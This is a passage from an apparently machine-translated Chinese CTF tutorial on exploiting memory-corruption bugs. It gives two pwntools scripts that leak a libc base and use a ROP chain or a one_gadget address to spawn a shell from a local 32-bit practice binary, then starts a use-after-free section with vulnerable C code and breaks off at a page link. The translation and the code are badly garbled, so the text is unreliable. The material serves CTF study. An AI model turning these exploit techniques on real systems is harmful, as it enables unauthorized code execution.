One_gadget and UAF combined with the use of a heap overflow vulnerability research-exploit warning-the black bar safety net

2019-04-19T00:00:00
ID MYHACK58:62201993760
Type myhack58
Reporter 佚名
Modified 2019-04-19T00:00:00

Description

!

Overview: through a simple ROP topics understanding One_gadget works, then use it to provide the ROP chain to achieve a heap of UAF vulnerabilities. Stack Overflow as a CTF pwn a big question, very worthy of study. The present article is for a certain Stack Overflow, and the stack use of the interest of the Junior partner. At the same time also welcome the members of the master, feel free to enlighten me on.

0x01 a simple ROP questions Prepare the tools: The first to introduce some of the two tool RopGadget and One_gadget. Are used to find the ROP chain, which RopGadget is mainly looking for can be used for our freedom with ret chain. And One_gadget more convenient, find the chain is as long as the call is directly can get the shell. Prior to use need to know the program to use the libc version, the local program in gdb, use vmmap to view. /lib/i386-linux-gnu/libc-2.23. so $ cp /lib/i386-linux-gnu/libc-2.23. so libc-2.23. the so #into the current directory, to facilitate debugging. These two tools grammar generally for RopGadget —binary /lib the path/the libc version —only “pop|ret”| grep register ! One_gadget /lib path/the libc version One_gadget is more convenient, only need to know the program's base address, and the following conditions are satisfied, for example the first chain [esp+0x28]==NULL, you can automatically generate a ROP chain. !

Topic analysis: The main function is no vulnerability, then look at the pwn function, the read function has a very obvious Stack Overflow. And the title is also leaking in addition to the read address, so that even if the opening of the ASLR can obtain the base address. Very clearly the ROP exploit. ! !

Leaked this portion itself is also need to construct a ROP, but the topic of reducing the difficulty, directly.

Then check the warranty of the machine mechanism, found only NX this machine also opened ASLR on. No open CANARY, so basically just need to use the ROP on the line. ROP solution a

!/ usr/bin/env Python 2

from pwn import *

libc = ELF('/lib32/libc-2.27. so')

libc=ELF('/lib/i386-linux-gnu/libc-2.23. so') p = process('./ rop32')

gdb. attach(p,'b execve nc')

p. recvuntil('you:')

Get the base address

libc_base = int(p. recvuntil('n'),16) - libc. symbols['read'] print libc_base

Calculate/bin/sh and execve's address

libc_bin_sh = libc_base + libc. search('/bin/sh'). next() libc_execve = libc_base + libc. symbols['execve']

Construct a ROP chain

send = 'a' * 0x3e + p32(libc_execve) + p32(0) + p32(libc_bin_sh) + p32(0) * 2 p. sendline(send) p. interactive() In addition to using your own construct a ROP chain, you can also use one_gadget look out for the gadget address. ROP solution II

!/ usr/bin/python2. 7

from pwn import * libc=ELF('libc-2.23. so') p=process('./ rop32')

gdb. attach(p)

context. log_level='debug'

p. recvuntil('let me help you:') libc_base=int(p. recvuntil('n'),16)-libc. symbols['read'] print "libc_base="+hex(libc_base) One_gadget=libc_base+0x3ac5e #from one_gadget libc-2.23. so payload="A"*0x3e+p32(One_gadget) p. sendline(payload) p. interactive() ! After the above test, can be found, one_gadget is only one address will be able to complete getshell. This feature in Stack Overflow is very important. So one_gadget in the heap overflow is more often used.

0x02 UAF exploits UAF Full Name Use After Free The use of a modified is Free space pointer, to achieve arbitrary code execution purposes. Need to master the two debugging techniques: 1.$ set {unsigned char} 0x555555757420 =0x70 #to modify the memory 2. Ctrl+c#to gdb to interrupt the program Vulnerability code:

include

include

include

include

include

void helpinfo() { printf("0: exitn1: mallocn2: writen3: readn4: freen"); } int main() { long action; char *buf[20]; long len; long t,i; setbuf(stdout, NULL); // alarm(10); printf("Welcome to CTFn"); printf("read:%pn",&read); helpinfo(); while(1) { scanf("%ld",&action); switch(action) { case 0: printf("GoodBye! n"); return 0; break;

[1] [2] [3] [4] next